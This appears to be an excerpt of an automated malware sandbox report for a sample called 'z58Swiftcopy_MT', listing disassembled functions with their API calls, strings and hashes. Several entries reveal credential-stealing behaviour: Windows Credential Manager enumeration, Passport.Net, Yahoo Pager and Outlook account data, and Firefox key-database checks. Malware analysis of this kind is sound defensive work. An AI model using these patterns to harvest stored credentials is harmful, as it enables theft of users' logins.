                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1786725549-0
                                                                                                                                                                                                                                      • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                                                                                      • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2014771361-0
                                                                                                                                                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID: global-salt$password-check
                                                                                                                                                                                                                                      • API String ID: 231171946-3927197501
                                                                                                                                                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                                                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset$strlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2142929671-0
                                                                                                                                                                                                                                      • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                      • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                                      • String ID: Passport.Net\*
                                                                                                                                                                                                                                      • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                                      • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                                      • String ID: Personalities
                                                                                                                                                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                                      • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                                      • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?), ref: 00406D87
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                      • API String ID: 1670431679-1552265934
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                      • API String ID: 231171946-3708268960
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                                      • API String ID: 438689982-3457389245
